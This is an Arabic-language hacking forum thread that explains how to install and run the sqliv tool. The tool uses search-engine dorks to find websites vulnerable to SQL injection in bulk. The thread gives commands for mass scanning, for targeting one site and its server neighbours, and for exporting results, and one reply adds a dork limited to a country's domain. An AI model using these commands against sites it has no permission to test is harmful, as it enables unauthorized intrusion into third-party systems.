المشاركات اخر المواضيع الاكثر مشاهدة

En çok mesaj

السلام عليكم ورحمة الله وبركاته أحبتي في الله أتمنى أن تكونوا بأتم الصحه والعافية اليوم بأذن الله سوف نتناول توضيح لطريقة من طرق إختبار إختراق عن طريق...

احصائياتى
الردود
2
المشاهدات
637

KALI PRO

:: اداري قسم اختبار الاختراق ::
طاقم الإدارة

إنضم
28 أغسطس 2018
المشاركات
92
مستوى التفاعل
122
النقاط
33
أفضل سكربت لإستخراج المواقع المصابة بثغرة sql injction
















السلام عليكم ورحمة الله وبركاته

أحبتي في الله أتمنى أن تكونوا بأتم الصحه والعافية

اليوم بأذن الله سوف نتناول توضيح لطريقة من طرق إختبار إختراق عن طريق


اداة
sqliv




















أفضل سكربت لإستخراج المواقع المصابة بثغرة Sql Injction عن طريق الدوركات فقط
طريقة تثبيت الأداة
الصق بها الامر:
pip install beautifulsoup4​
git clone https://github.com/the-robot/sqliv.git
cd sqliv
pip install -r requirements.txt
python2 setup.py -i​

لتشغيل الأداة
python sqliv.py​

كيفية الاستخدام


يجب ان نمرر للاداة الدورك dork ومحرك البحث المراد البحث بواسطته قوقل او بينج او ياهو


-d inurl:example تضع هنا الدورك
-e bing, google, yahoo وهنا محرك البحث
-p 100 هنا يمكن ان تحدد عدد المواقع المصابة المستخرجة
-t www.example.com هذا البرامتر ان اردت فحص موقع معين فقط
-o result.json لتصدير النتائج لملف
للبحث عن مواقع متعددة يكون الأمر:
python sqliv.py -d <SQLI DORK> -e <SEARCH ENGINE>
python sqliv.py -d "inurl:index.php?id=" -e google
وهذا الامر الذي طبقته
python sqliv.py -e google -d ".php?id="


طريقة استهداف موقع معين
python sqliv.py -t <URL>
python sqliv.py -t www.example.com
python sqliv.py -t www.example.com/index.php?id=1
طريقة البحث عن مواقع مصابة على نفس السيرفر
python sqliv.py -t <URL> -r​
تصدير النتائج لملف JSON
python sqliv.py -d <SQLI DORK> -e <SEARCH ENGINE> -o result.json​
 

assdsiwi

:: Super Moderator ::
طاقم الإدارة

إنضم
22 مارس 2019
المشاركات
275
مستوى التفاعل
393
النقاط
63
أفضل سكربت لإستخراج المواقع المصابة بثغرة sql injction
تحياتى لك روعة
 

assdsiwi

:: Super Moderator ::
طاقم الإدارة

إنضم
22 مارس 2019
المشاركات
275
مستوى التفاعل
393
النقاط
63
أفضل سكربت لإستخراج المواقع المصابة بثغرة sql injction
كود:
python sqliv.py -d "inurl:index.php?id= site:ly " -e google


site: ----> للبحث عن البلدان
 
أعلى